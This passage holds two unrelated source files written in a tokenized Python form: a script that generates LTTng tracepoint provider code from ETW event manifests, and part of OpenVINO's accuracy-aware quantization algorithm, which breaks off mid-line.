LTTNG_CHAKRA_H"+providerName+" */")<line_sep>headerLines.append("#include <lttng/tracepoint-event.h>")<line_sep><return>"\n".join(headerLines)<block_end><def_stmt>generateMethodBody template providerName eventName# Convert from ETW's windows types to LTTng compatiable types <block_start>methodBody=[""]<line_sep>functionSignature=template.signature<if_stmt><not>shouldPackTemplate(template)<block_start>invocation=["do_tracepoint("+providerName 
eventName]<for_stmt>paramName functionSignature.paramList<block_start>functionParam=functionSignature.getParam(paramName)<line_sep>wintypeName=functionParam.winType<line_sep>winCount=functionParam.count<line_sep>ctf_type=<none><if_stmt>functionParam.outType<block_start>ctf_type=ctfDataTypeMapping.get(functionParam.outType)<block_end><else_stmt><block_start>ctf_Type=ctfDataTypeMapping.get(winCount)<block_end><if_stmt><not>ctf_type<block_start>ctf_type=ctfDataTypeMapping[wintypeName]<block_end><if_stmt>ctf_type<eq>"ctf_string"<and>wintypeName<eq>"win:UnicodeString"# Convert wchar unicode string to utf8 <block_start><if_stmt>functionParam.length<block_start>methodBody.append("utf8::WideToNarrow "+paramName+"_converter("+paramName+", "+functionParam.length+");")<block_end><else_stmt><block_start>methodBody.append("utf8::WideToNarrow "+paramName+"_converter("+paramName+");")<block_end>invocation.append(paramName+"_converter")<block_end># elif ctf_type == "ctf_sequence" or wintypeName == "win:Pointer": <elif_stmt>wintypeName<eq>"win:Pointer"<block_start>invocation.append("("+lttngDataTypeMapping[wintypeName]+lttngDataTypeMapping[winCount]+")"+paramName)<block_end><else_stmt><block_start>invocation.append(paramName)<block_end><block_end>methodBody.append(",\n ".join(invocation)+");")<block_end><else_stmt># Packing results into buffer <block_start>methodBody.append("char stackBuffer["+str(template.estimatedSize)+"];")<line_sep>methodBody.append("char *buffer = stackBuffer;")<line_sep>methodBody.append("int offset = 0;")<line_sep>methodBody.append("int size = "+str(template.estimatedSize)+";")<line_sep>methodBody.append("bool fixedBuffer = true;")<line_sep>methodBody.append("bool success = true;")<for_stmt>paramName functionSignature.paramList<block_start>functionParameter=functionSignature.getParam(paramName)<if_stmt>paramName<in>template.structCounts<block_start>size="(unsigned int)"+paramName+"_ElementSize * (unsigned 
int)"+template.structCounts[paramName]<line_sep>methodBody.append("success &= WriteToBuffer((const char *)"+paramName+", "+size+", buffer, offset, size, fixedBuffer);")<block_end><elif_stmt>paramName<in>template.arrayCounts<block_start>size="sizeof("+lttngDataTypeMapping[functionParameter.winType]+") * (unsigned int)"+template.arrayCounts[paramName]<line_sep>methodBody.append("success &= WriteToBuffer((const char *)"+paramName+", "+size+", buffer, offset, size, fixedBuffer);")<block_end><elif_stmt>functionParameter.winType<eq>"win:GUID"<block_start>methodBody.append("success &= WriteToBuffer(*"+paramName+", buffer, offset, size, fixedBuffer);")<block_end><else_stmt><block_start>methodBody.append("success &= WriteToBuffer("+paramName+", buffer, offset, size, fixedBuffer);")<block_end><block_end>methodBody.append("if (!success)")<line_sep>methodBody.append("{")<line_sep>methodBody.append(" if (!fixedBuffer) delete[] buffer;")<line_sep>methodBody.append(" return ERROR_WRITE_FAULT;")<line_sep>methodBody.append("}")<line_sep>methodBody.append("do_tracepoint("+providerName+", "+eventName+", offset, buffer);")<line_sep>methodBody.append("if (!fixedBuffer) delete[] buffer;")<block_end><return>"\n ".join(methodBody)+"\n"<block_end><def_stmt>generateMethodSignature template<block_start><if_stmt><not>template<block_start><return>""<block_end>functionSignature=template.signature<line_sep>lineFunctionPrototype=[]<for_stmt>paramName functionSignature.paramList<block_start>functionParameter=functionSignature.getParam(paramName)<line_sep>wintypeName=functionParameter.winType<line_sep>mappedType=palDataTypeMapping[wintypeName]<line_sep>winCount=functionParameter.count<line_sep>mappedCount=palDataTypeMapping[winCount]<if_stmt>paramName<in>template.structCounts<block_start>lineFunctionPrototype.append(" int "+paramName+"_ElementSize")<block_end># lineFunctionPrototype.append("// " + wintypeName + " " + str(functionParameter.length)) lineFunctionPrototype.append(" 
"+mappedType+(mappedCount<if>mappedCount<ne>" "<else>"*"<if>functionParameter.length<and><not>wintypeName<in>["win:UnicodeString" "win:AnsiString"]<else>"")+" "+functionParameter.name)<block_end><return>",\n".join(lineFunctionPrototype)<block_end><def_stmt>generateLttngTracepointProvider providerName lttngHeader templates events<block_start>providerLines=[]<line_sep>providerLines.append("#define TRACEPOINT_DEFINE")<line_sep>providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY")<line_sep>providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE")<line_sep>providerLines.append("#endif")<line_sep>providerLines.append("#include \"stdlib.h\"")<line_sep>providerLines.append("#include \"Common.h\"")<line_sep>providerLines.append("#include \"Codex/Utf8Helper.h\"")<line_sep>providerLines.append("#include \""+lttngHeader+"\"\n\n")<line_sep>providerLines.append("#ifndef tracepoint_enabled")<line_sep>providerLines.append("#define tracepoint_enabled(provider, name) 1")<line_sep>providerLines.append("#define do_tracepoint tracepoint")<line_sep>providerLines.append("#endif")<line_sep>providerLines.append(""" bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer) { newSize *= 1.5; _ASSERTE(newSize > size); // Check for overflow if (newSize < 32) { newSize = 32; } char *newBuffer = new char[newSize]; memcpy(newBuffer, buffer, currentLength); if (!fixedBuffer) { delete[] buffer; } buffer = newBuffer; size = newSize; fixedBuffer = false; return true; } bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer) { if (!src) { return true; } if (offset + len > size) { if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer)) { return false; } } memcpy(buffer + offset, src, len); offset += len; return true; } template <typename T> bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer) { if (sizeof(T) + offset > size) { if (!ResizeBuffer(buffer, size, offset, 
size + sizeof(T), fixedBuffer)) { return false; } } *(T *)(buffer + offset) = value; offset += sizeof(T); return true; } """)<for_stmt>eventNode events<block_start>eventName=eventNode.getAttribute('symbol')<line_sep>templateName=eventNode.getAttribute('template')<line_sep>providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}"%(eventName providerName eventName))<line_sep>providerLines.append("")<line_sep>template=<none><if_stmt>templateName<block_start>template=templates[templateName]<block_end>providerLines.append("extern \"C\" unsigned long FireEtXplat"+eventName+"(")<line_sep>providerLines.append(generateMethodSignature(template))<line_sep>providerLines.append(")")<line_sep>providerLines.append("{")<line_sep>providerLines.append(" if (!EventXplatEnabled"+eventName+"())")<line_sep>providerLines.append(" return ERROR_SUCCESS;")<if_stmt>template<block_start>providerLines.append(generateMethodBody(template providerName eventName))<block_end><else_stmt><block_start>providerLines.append(" do_tracepoint("+providerName+", "+eventName+");")<block_end>providerLines.append("")<line_sep>providerLines.append(" return ERROR_SUCCESS;")<line_sep>providerLines.append("}")<line_sep>providerLines.append("")<block_end><return>"\n".join(providerLines)<block_end><def_stmt>generateEtwHeader templates events<block_start>headerLines=[]<line_sep>headerLines.append("#include \"pal.h\"")<line_sep>headerLines.append("")<for_stmt>event events<block_start>eventName=event.getAttribute('symbol')<line_sep>templateName=event.getAttribute('template')<line_sep>template=<none><if_stmt>templateName<block_start>template=templates[templateName]<block_end>callArgs=[]<if_stmt>template<block_start>functionSignature=template.signature<for_stmt>param functionSignature.paramList<block_start><if_stmt>param<in>template.structCounts<block_start>callArgs.append(param+"_ElementSize")<block_end>callArgs.append(param)<block_end><block_end>headerLines.append("extern \"C\" 
bool EventXplatEnabled"+eventName+"();")<line_sep>headerLines.append("inline bool EventEnabled"+eventName+"() { return EventXplatEnabled"+eventName+"();}")<line_sep>headerLines.append("")<line_sep>headerLines.append("extern \"C\" unsigned long FireEtXplat"+eventName+" (")<line_sep>headerLines.append(generateMethodSignature(template))<line_sep>headerLines.append(");")<line_sep>headerLines.append("inline unsigned long EventWrite"+eventName+"(")<line_sep>headerLines.append(generateMethodSignature(template))<line_sep>headerLines.append(")")<line_sep>headerLines.append("{")<line_sep>headerLines.append(" return FireEtXplat"+eventName+"("+", ".join(callArgs)+");")<line_sep>headerLines.append("}")<line_sep>headerLines.append("")<block_end><return>"\n".join(headerLines)<block_end><def_stmt>generateCmakeFile providerName<block_start>cmakeLines=[]<line_sep>cmakeLines.append("project(Chakra.LTTng)")<line_sep>cmakeLines.append("")<line_sep>cmakeLines.append("add_compile_options(-fPIC)")<line_sep>cmakeLines.append("")<line_sep>cmakeLines.append("add_library (Chakra.LTTng OBJECT")<line_sep>cmakeLines.append(" eventprovider"+providerName+".cpp")<line_sep>cmakeLines.append(" tracepointprovider"+providerName+".cpp")<line_sep>cmakeLines.append(")")<line_sep><return>"\n".join(cmakeLines)<block_end><def_stmt>generateLttngFiles manifest providerDirectory<block_start><import_stmt>os<line_sep>tree=DOM.parse(manifest)<if_stmt><not>os.path.exists(providerDirectory)<block_start>os.makedirs(providerDirectory)<block_end><if_stmt><not>os.path.exists(providerDirectory+"/lttng")<block_start>os.makedirs(providerDirectory+"/lttng")<block_end><for_stmt>providerNode tree.getElementsByTagName("provider")<block_start>providerName=providerNode.getAttribute("name")<line_sep>providerName=providerName.replace("Microsoft-" 
"")<line_sep>providerNameFile=providerName.lower()<line_sep>lttngEventHeaderShortName="tp"+providerNameFile+".h"<line_sep>lttngEventHeaderPath=providerDirectory+"/lttng/"+lttngEventHeaderShortName<line_sep>lttngEventProvider=providerDirectory+"/lttng/eventprovider"+providerNameFile+".cpp"<line_sep>lttngEventProviderTrace=providerDirectory+"/lttng/tracepointprovider"+providerNameFile+".cpp"<line_sep>lttngEtwHeaderFile=providerDirectory+"/lttng/"+providerNameFile+"Etw.h"<line_sep>lttngCmakeFile=providerDirectory+"/lttng/CMakeLists.txt"<line_sep>lttngHeader=open(lttngEventHeaderPath "w")<line_sep>lttngImplementation=open(lttngEventProvider "w")<line_sep>lttngTraceImplementation=open(lttngEventProviderTrace "w")<line_sep>lttngEtwHeader=open(lttngEtwHeaderFile "w")<line_sep>lttngCmake=open(lttngCmakeFile "w")<line_sep># Create the lttng implementation lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n")<line_sep>lttngTraceImplementation.write("#include \"./"+lttngEventHeaderShortName+"\"\n")<line_sep>lttngTraceImplementation.close()<line_sep># Create the lttng header templateNodes=providerNode.getElementsByTagName('template')<line_sep>eventNodes=providerNode.getElementsByTagName('event')<line_sep>allTemplates=parseTemplateNodes(templateNodes)<line_sep>lttngHeader.write(generateLttngHeader(providerName lttngEventHeaderShortName allTemplates eventNodes))<line_sep>lttngHeader.close()<line_sep>lttngImplementation.write(generateLttngTracepointProvider(providerName lttngEventHeaderShortName allTemplates eventNodes))<line_sep>lttngImplementation.close()<line_sep>lttngEtwHeader.write(generateEtwHeader(allTemplates eventNodes))<line_sep>lttngEtwHeader.close()<line_sep># Note: This in particular assumes that there is only one ETW provider 
lttngCmake.write(generateCmakeFile(providerNameFile))<line_sep>lttngCmake.close()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_stmt>argparse<import_stmt>sys<line_sep>parser=argparse.ArgumentParser(description="Generates the Code required to instrument LTTtng logging mechanism")<line_sep>required=parser.add_argument_group('required arguments')<line_sep>required.add_argument('--man' type=str required=<true> help='full path to manifest containig the description of events')<line_sep>required.add_argument('--intermediate' type=str required=<true> help='full path to eventprovider intermediate directory')<line_sep>args,unknown=parser.parse_known_args(sys.argv[1:])<if_stmt>unknown<block_start>print('Unknown argument(s): ' ', '.join(unknown))<line_sep>sys.exit(1)<block_end>generateLttngFiles(args.man args.intermediate)<line_sep>sys.exit(0)<block_end>
# Copyright (C) 2020-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 <import_stmt>os<import_stmt>random<import_from_stmt>copy deepcopy<import_from_stmt>sys maxsize<import_stmt>numpy<as>np<import_from_stmt>.utils create_metric_config is_preset_performance get_mixed_preset_config evaluate_model get_num_of_quantized_ops<import_from_stmt>..utils load_hardware_config<import_from_stmt>...algorithm Algorithm<import_from_stmt>...algorithm_selector COMPRESSION_ALGORITHMS<import_from_stmt>....algorithms.quantization utils<as>eu<import_from_stmt>....graph node_utils<as>nu<import_from_stmt>....graph.model_utils save_model get_nodes_by_type<import_from_stmt>....graph.transformer GraphTransformer<import_from_stmt>....samplers.creator create_sampler<import_from_stmt>....statistics.statistics TensorStatistic<import_from_stmt>....utils.logger get_logger<import_from_stmt>....utils.telemetry send_event<line_sep>logger=get_logger(__name__)<line_sep># pylint: disable=R0912 @COMPRESSION_ALGORITHMS.register('AccuracyAwareCommon')<class_stmt>AccuracyAwareCommon(Algorithm)<block_start>name='AccuracyAwareCommon'<def_stmt>__init__ self config engine<block_start>super().__init__(config engine)<line_sep># configure default parameters default_config={'metric_subset_ratio':0.5 'ranking_subset_size':config.get('ranking_subset_size' min(len(engine.data_loader) 300)) 'max_iter_num':maxsize 'maximal_drop':0.01 'drop_type':'absolute' 'use_prev_if_drop_increase':<true> 'base_algorithm':'DefaultQuantization' 'annotation_free':<false> 'tune_hyperparams':<false> 'annotation_conf_threshold':0.6 'convert_to_mixed_preset':<false>}<for_stmt>setting default_config<block_start><if_stmt>setting<not><in>self._config<block_start>self._config[setting]=default_config[setting]<block_end><block_end>self._config.convert_to_mixed_preset=self._config.convert_to_mixed_preset<and>is_preset_performance(self._config)<line_sep>save_dir=self._config.get('exec_log_dir' 
os.path.curdir)<line_sep>self._config.intermediate_log_dir=os.path.join(save_dir 'accuracy_aware_intermediate')<line_sep>self._engine.calculate_metrics=<true><line_sep># Create initial quantization algorithms self._quantization_algo=self._create_quantization_algo(self._config 'AAQuantizationAlgorithm' self._engine)<line_sep>self._preset_conversion_algo=self._create_quantization_algo(get_mixed_preset_config(self._config) 'AAConversionAlgorithm' self._engine)<line_sep>self._grid_search_algo=COMPRESSION_ALGORITHMS.get('ParamsGridSearchAlgorithm')(self._config engine)<line_sep>self._grid_search_algo.default_algo=self._quantization_algo<line_sep># Configure metrics self._metrics_config=create_metric_config(self._engine self._config)<line_sep>self._baseline_metric={metric.name:metric.baseline_value<for>metric self._config.metrics<if>metric.name<in>self._metrics_config}<if>self._config.metrics<and>all('baseline_value'<in>metric.keys()<for>metric self._config.metrics)<else>{}<line_sep>self._max_drop_by_name={}<line_sep>self._original_per_sample_metrics=<none><line_sep>self._output_node_name,self._stats_layout=<none> <none><line_sep>self._quantized_layers_num=0<line_sep>self._dataset_size=len(self._engine.data_loader)<line_sep>metric_subset_size=int(self._dataset_size<times>self._config.metric_subset_ratio)<line_sep>self._diff_subset_indices=sorted(random.sample(range(self._dataset_size) metric_subset_size))<if>metric_subset_size<l>self._dataset_size<and>self._baseline_metric<else>list(range(self._dataset_size))<line_sep>self._graph_transformer=GraphTransformer(load_hardware_config(self._config))<line_sep>self.default_steps_size=0.005<line_sep>self.total_exec_steps=self._config.get('stat_subset_size' 
self._dataset_size)<line_sep>self._quantization_algo.default_steps_size=self.default_steps_size<if_stmt>self._config.convert_to_mixed_preset<block_start>self._preset_conversion_algo.default_steps_size=self.default_steps_size<block_end>self._stats_collector=<none><line_sep>self._precision_change_to='floating-point'<line_sep>self._need_to_change_scope=<true><line_sep>self._change_conditions=<none><line_sep>self._exclude_bad_nodes=<false><block_end>@property<def_stmt>change_original_model self<block_start><return><true><block_end><def_stmt>register_statistics self model stats_collector<block_start>self._stats_collector=stats_collector<line_sep>self._quantization_algo.register_statistics(model stats_collector)<if_stmt>self._config.convert_to_mixed_preset<block_start>self._preset_conversion_algo.register_statistics(model stats_collector)<block_end><if_stmt>self._config.tune_hyperparams<block_start>self._grid_search_algo.register_statistics(model stats_collector)<block_end><block_end><def_stmt>run self model<block_start>""" this function applies the accuracy aware quantization scope search algorithm :param model: model to apply algo :return model with modified quantization scope to match required accuracy values """<if_stmt><not>self._metrics_config<block_start>logger.info('Could not find the required metrics for optimization in the engine. '<concat>'Stop AccuracyAware optimization. '<concat>'Available metrics: %s.' 
', '.join(self._engine.get_metrics_attributes()))<line_sep>logger.update_progress(self.total_exec_steps)<line_sep><return>model<block_end># configure stats layout to collect raw output # to calculate persample difference for special metrics self._output_node_name=nu.get_node_input(model.get_final_output_nodes()[0] 0).name<line_sep># gets first output node <for_stmt>metric_config self._metrics_config.values()<block_start><if_stmt>metric_config.persample.is_special<block_start>self._stats_layout={self._output_node_name:{'output_logits':TensorStatistic(<lambda>a:a)}}<line_sep><break><block_end><block_end>self._request_alt_statistics(model)<line_sep>print_progress=logger.progress_bar_disabled<if_stmt><not>self._baseline_metric<or>self._config.annotation_free# collect predictions of original model <block_start><if_stmt>self._config.annotation_free<block_start>self._engine.dump_prediction_to_annotation=<true><line_sep>self._engine.annotation_conf_threshold=self._config.annotation_conf_threshold<block_end>self._baseline_metric,self._original_per_sample_metrics=self._collect_baseline(model print_progress)<block_end>logger.info('Baseline metrics: %s' self._baseline_metric)<line_sep># update dataset info <if_stmt>self._config.annotation_free<block_start>self._dataset_size=len(self._engine.data_loader)<line_sep>self._diff_subset_indices=list(range(self._dataset_size))<block_end># configure values of metrics maximum drop max_drop=self._config.maximal_drop<if_stmt>self._config.drop_type<eq>'relative'<block_start>self._max_drop_by_name={name:value<times>max_drop<for>name,value self._baseline_metric.items()}<block_end><else_stmt><block_start>self._max_drop_by_name={name:max_drop<for>name,value self._baseline_metric.items()}<block_end># quantize model quantized_model,metrics_accuracy_drop,quantized_metrics_per_sample=self._quantize_and_evaluate(deepcopy(model) self._quantize_model 
print_progress=print_progress)<line_sep>self._save_intermediate_model(quantized_model)<if_stmt>self._drop_restrictions_are_met(metrics_accuracy_drop)<block_start>send_event("result_aa" self._get_result_aa(metrics_accuracy_drop 0))<line_sep><return>quantized_model<block_end>default_quantization_config=self._quantization_algo.config<line_sep># change quantization preset of the model if possible <if_stmt>self._config.convert_to_mixed_preset<block_start>quantized_model,metrics_accuracy_drop,quantized_metrics_per_sample=self._quantize_and_evaluate(deepcopy(model) self._convert_model_to_mixed_preset print_progress=print_progress)<line_sep>self._save_intermediate_model(quantized_model)<if_stmt>self._drop_restrictions_are_met(metrics_accuracy_drop)<block_start>send_event("result_aa" self._get_result_aa(metrics_accuracy_drop 0))<line_sep><return>quantized_model<block_end>default_quantization_config=self._preset_conversion_algo.config<block_end><if_stmt><not>self._original_per_sample_metrics<block_start>_,self._original_per_sample_metrics=self._evaluate_model(model=model subset_indices=self._diff_subset_indices)<block_end># change quantization parameters of the model <if_stmt>self._config.tune_hyperparams<block_start>worst_ranking_subset=self._create_hardest_ranking_subset(quantized_metrics_per_sample)<line_sep>self._grid_search_algo.update_config(default_quantization_config)<line_sep>self._grid_search_algo.set_subset_and_metric(worst_ranking_subset self._metrics_config)<line_sep>self._engine.allow_pairwise_subset=<true><line_sep>updated_quantized_model,updated_metrics_accuracy_drop,updated_quantized_metrics_per_sample=self._quantize_and_evaluate(deepcopy(model) self._search_optimal_parameters print_progress=print_progress)<line_sep>default_mean_drop=np.mean([value<for>name,value metrics_accuracy_drop.items()])<line_sep>updated_mean_drop=np.mean([value<for>name,value 
updated_metrics_accuracy_drop.items()])<if_stmt>updated_mean_drop<l>default_mean_drop<block_start>logger.info('Applying the best configuration')<line_sep>quantized_model=updated_quantized_model<line_sep>metrics_accuracy_drop=updated_metrics_accuracy_drop<line_sep>quantized_metrics_per_sample=updated_quantized_metrics_per_sample<block_end>self._engine.allow_pairwise_subset=<false><line_sep>self._save_intermediate_model(quantized_model)<if_stmt>self._drop_restrictions_are_met(metrics_accuracy_drop)<block_start>send_event("result_aa" self._get_result_aa(metrics_accuracy_drop 0))<line_sep><return>quantized_model<block_end><block_end># we need to do this for more efficient memory consumption which is too high # because _change_quantization_scope(..) will allocate one more model <del_stmt>model<if_stmt>self._need_to_change_scope<block_start><return>self._change_quantization_scope(quantized_model metrics_accuracy_drop quantized_metrics_per_sample)<block_end>logger.info('Quantization scope was not changed due to algo conditions: %s' self._change_conditions)<line_sep>logger.update_progress(self.total_exec_steps)<line_sep><return>quantized_model<block_end><def_stmt>_collect_baseline self model print_progress<block_start>logger.info('Start original model inference')<line_sep><return>self._evaluate_model(model=model print_progress=print_progress)<block_end><def_stmt>_change_quantization_scope self model original_accuracy_drop fully_quantized_metrics_per_sample<block_start>"""Applies greedy search to remove fake-quantize nodes that degrade metric values :param model: fully quantized model :param original_accuracy_drop: dictionary of per-metric drops of fully quantized model {metric_name: drop_value} :param fully_quantized_metrics_per_sample: dictionary of per-sample metrics values of fully quantized model :return model: model with new quantization scope """<line_sep>self._quantized_layers_num=self._get_num_of_quantized_ops(model)<line_sep>logger.info('The total number of 
quantized operations in the graph: %d' self._quantized_layers_num)<line_sep>logger.info('Changing fake quantize nodes scope')<line_sep>all_changed_nodes_names=[]<line_sep>all_ops_in_targeted_prec=set()<line_sep>drop_functor=<lambda>a:(original_accuracy_drop[a]-self._max_drop_by_name[a])/self._baseline_metric[a]<line_sep>metric_to_optimize=sorted(original_accuracy_drop.keys() key=drop_functor)[-1]<line_sep>logger.info('Optimizing %s metric' metric_to_optimize)<line_sep>accuracy_drop=original_accuracy_drop[metric_to_optimize]<line_sep># calculate importance of fq nodes node_importance=self._get_node_importance(model metric_to_optimize fully_quantized_metrics_per_sample)<line_sep>quantized_metrics_per_sample=<none><line_sep>reached_required_drop=<false><line_sep>changed_all_fq=<false><line_sep>is_step_back=<true><line_sep>iteration=0<line_sep>excluded_nodes=[]<for_stmt>iteration range(self._config.max_iter_num)# save model and metrics from previous iteration <block_start>model_prev_iter=deepcopy(model)<line_sep>metrics_prev_iter=deepcopy(quantized_metrics_per_sample)<if_stmt><not>node_importance<block_start>logger.info('All layers have been checked and the AccuracyAwareQuantization '<concat>'will not be able to achieve the required accuracy drop')<line_sep>changed_all_fq=<true><line_sep><break><block_end># greedy removal of the FQ node with the highest importance score fq_name_to_change=node_importance.pop(0)<line_sep>model,changed_nodes,ops_in_targeted_prec=self._modify_model_in_scope(model [fq_name_to_change])<line_sep>logger.debug('Changed a block of %d FQ layers: %s' len(changed_nodes) changed_nodes)<line_sep>logger.info('Reverted %d layers to the %s precision: %s' len(ops_in_targeted_prec) self._precision_change_to ', '.join(ops_in_targeted_prec))<line_sep>all_changed_nodes_names.append(str(changed_nodes))<line_sep>all_ops_in_targeted_prec.update(ops_in_targeted_prec)<line_sep># save intermediate model self._save_intermediate_model(model)<line_sep># calculate 
drop for new quantization scope final_metrics,quantized_metrics_per_sample=self._evaluate_model(model=model per_sample_subset_indices=self._diff_subset_indices print_progress=<true>)<line_sep>metrics_accuracy_drop={name:params.comparator(self._baseline_metric[name]-final_metrics[name])<for>name,params self._metrics_config.items()}<line_sep>new_accuracy_drop=metrics_accuracy_drop[metric_to_optimize]<line_sep>logger.info('Accuracy drop with the new quantization scope is %s' metrics_accuracy_drop)<line_sep># removed all fake-quantize layers from the model <if_stmt><not>get_nodes_by_type(model ['FakeQuantize'])<block_start>logger.info('Removed all FQ layers from the network!')<line_sep>changed_all_fq=<true><line_sep><break><block_end># all drop restrictions are met <if_stmt>self._drop_restrictions_are_met(metrics_accuracy_drop)<block_start>reached_required_drop=<true><line_sep><break><block_end># continue greedy fq removal <if_stmt>self._max_drop_by_name[metric_to_optimize]<l>new_accuracy_drop<le>accuracy_drop<or>(new_accuracy_drop<g>accuracy_drop<and>is_step_back)<block_start>is_step_back=<false><line_sep>accuracy_drop=new_accuracy_drop<line_sep><continue><block_end># if after fq removal drop has increased # calculate node importance of the model (from previous iteration) <if_stmt>new_accuracy_drop<g>accuracy_drop<and>self._config.use_prev_if_drop_increase<block_start>model=model_prev_iter<line_sep>quantized_metrics_per_sample=metrics_prev_iter<line_sep>all_changed_nodes_names.remove(str(changed_nodes))<line_sep>all_ops_in_targeted_prec.difference_update(ops_in_targeted_prec)<if_stmt>self._exclude_bad_nodes<block_start>excluded_nodes.extend(changed_nodes)<block_end>logger.debug('%s added to excluded list: %s' str(changed_nodes) str(excluded_nodes))<line_sep>is_step_back=<true><block_end>accuracy_drop=new_accuracy_drop<line_sep># if drop restriction for the current metric is satisfied, select the next metric # and calculate node importance 
<if_stmt>new_accuracy_drop<le>self._max_drop_by_name[metric_to_optimize]<block_start>metric_to_optimize=sorted(original_accuracy_drop.keys() key=<lambda>a current_drop=metrics_accuracy_drop:(current_drop[a]-self._max_drop_by_name[a])/self._baseline_metric[a])[-1]<line_sep>logger.info('Optimizing %s metric' metric_to_optimize)<line_sep>accuracy_drop=original_accuracy_drop[metric_to_optimize]<line_sep>is_step_back=<false><block_end><del_stmt>model_prev_iter metrics_prev_iter<line_sep>logger.info('Re-calculating node importance')<line_sep>node_importance=self._get_node_importance(model metric_to_optimize quantized_metrics_per_sample excluded_nodes)<block_end><if_stmt>changed_all_fq<or><not>reached_required_drop# Do not remove or change! <block_start>logger.info('AccuracyAwareQuantization could not achieve the required accuracy drop.' force=<true>)<block_end><if_stmt>iteration+1<ge>self._config.max_iter_num<block_start>logger.info('Reached maximum number of iterations.')<block_end><if_stmt><not>changed_all_fq<block_start>logger.debug('Changed FakeQuantize nodes:\n %s' '\n'.join(all_changed_nodes_names))<line_sep>logger.info(' %d out of %d layers have been reverted back to the %s precision: %s' len(all_ops_in_targeted_prec) self._quantized_layers_num self._precision_change_to ', '.join(all_ops_in_targeted_prec))<line_sep>send_event("result_aa" self._get_result_aa(metrics_accuracy_drop len(all_ops_in_targeted_prec)))<block_end>logger.update_progress(self.total_exec_steps)<line_sep><return>model<block_end><def_stmt>_get_node_importance self model metric_name qmodel_per_sample_metrics=<none> excluded_nodes=<none><block_start>"""Creates a list of fake-quantize nodes importance in descending order based on their contribution to metric degradation :param model: model with fake-quantize nodes :param metric_name: metric to be taken into consideration :param qmodel_per_sample_metrics: per-sample metrics values of quantized model :return list of node names 
"""<if_stmt>qmodel_per_sample_metrics<is><none># get quantized model predictions <block_start>_,qmodel_per_sample_metrics=self._evaluate_model(model=model subset_indices=self._diff_subset_indices)<block_end>ranking_subset=self._get_ranking_subset(qmodel_per_sample_metrics metric_name)# not sorted node_importance_score=self._calculate_node_importance_scores(model ranking_subset metric_name excluded_nodes)<line_sep># sort by error value and then by node name node_importance=sorted(node_importance_score.items() key=<lambda>x:(x[1] x[0]) reverse=<true>)<line_sep>node_importance=[n[0]<for>n node_importance]<line_sep><return>node_importance<block_end><def_stmt>_get_ranking_subset self qmodel_per_sample_metrics metric_name from_id=0<block_start>"""Determines samples on which the quantized model predicts worse than on the original model :param qmodel_per_sample_metrics: per-sample metrics values of the quantized model :param metric_name: metric to take into account :return a list of image ids """<line_sep>persample_metric=self._metrics_config[metric_name].persample<line_sep>sorted_sample_importance=persample_metric.sort_fn(self._original_per_sample_metrics[persample_metric.name] qmodel_per_sample_metrics[persample_metric.name] reverse=<true>)<line_sep>to_id=from_id+self._config.ranking_subset_size<line_sep>ranking_subset=np.array(self._diff_subset_indices)[sorted_sample_importance[from_id:to_id]]<line_sep><return>ranking_subset<block_end><def_stmt>_calculate_node_importance_scores self model ranking_subset metric_name excluded_nodes=<none><block_start>"""Cuts out FQ layers one after another and measures metric value on ranking subset. The higher the value, the more important the node. 
:param model: graph from which to cut nodes :param ranking_subset: subset on which the scores will be calculated :param metric_name: metric to take into account :return a dictionary of node importance {metric_name: score} """<line_sep>change_fqs=[]<line_sep>node_importance_score={}<line_sep>eu.select_evaluation_dataset(self._engine)<line_sep>fake_quantize_nodes=get_nodes_by_type(model ['FakeQuantize'])<for_stmt>node fake_quantize_nodes<block_start><if_stmt>excluded_nodes<and>node.name<in>excluded_nodes<block_start><continue><block_end><if_stmt>node.name<not><in>change_fqs<block_start>modified_model,modified_fq_layers,_=self._modify_model_in_scope(deepcopy(model) [node.name])<if_stmt><not>modified_fq_layers<block_start><continue><block_end>logger.debug('Changed\\Removed a block of %d FQ layers: %s' len(modified_fq_layers) modified_fq_layers)<line_sep>change_fqs<augadd>modified_fq_layers<line_sep>self._engine.set_model(modified_model)<line_sep>self._engine.allow_pairwise_subset=<true><line_sep>index_sampler=create_sampler(self._engine samples=list(ranking_subset))<line_sep>metrics,*_=self._engine.predict(sampler=index_sampler)<line_sep>self._engine.allow_pairwise_subset=<false><line_sep>logger.update_progress(self._config.ranking_subset_size)<line_sep>ranking_metric=self._metrics_config[metric_name].ranking<line_sep>node_importance_score[node.name]=ranking_metric.comparator(metrics[ranking_metric.name])<block_end><block_end>eu.reset_dataset_to_default(self._engine)<line_sep><return>node_importance_score<block_end><def_stmt>_modify_model_in_scope self model nodes_names<block_start><return>self._graph_transformer.remove_fq_nodes(deepcopy(model) nodes_names)<block_end><def_stmt>compute_total_exec_steps self model=<none><block_start>total_steps=0<line_sep># add dataset_size to total if baseline not implemented <if_stmt><not>self._baseline_metric<or>self._config.annotation_free<block_start>total_steps<augadd>self._dataset_size<block_end># add dataset_size to total for 
int8 inference total_steps<augadd>self._dataset_size<line_sep># add dataset_size to total in case of conversion to mixed mode <if_stmt>self._config.convert_to_mixed_preset<block_start>total_steps<augadd>self._dataset_size<block_end>nodes_length=len(get_nodes_by_type(model ['Convolution' 'MatMul']))<line_sep>num_steps=self._config['max_iter_num']<if>self._config['max_iter_num']<l>maxsize<else>nodes_length<line_sep>metric_computing_steps=nodes_length<times>self._config['ranking_subset_size']<line_sep># add ranking_subset_size for num_steps and again computing every 3 steps total_steps<augadd>metric_computing_steps+metric_computing_steps<times>self._config['ranking_subset_size']<times>num_steps/3<line_sep># add total run steps (num steps) without one of FQs pairs total_steps<augadd>num_steps<times>self._dataset_size<line_sep># number of statistics computing total_steps<augadd>self._quantization_algo.total_exec_steps<if_stmt>self._config.convert_to_mixed_preset<block_start>total_steps<augadd>self._preset_conversion_algo.total_exec_steps<block_end>self.total_exec_steps=total_steps<block_end><def_stmt>_convert_model_to_mixed_preset self model<block_start>logger.info('Start quantization in mixed 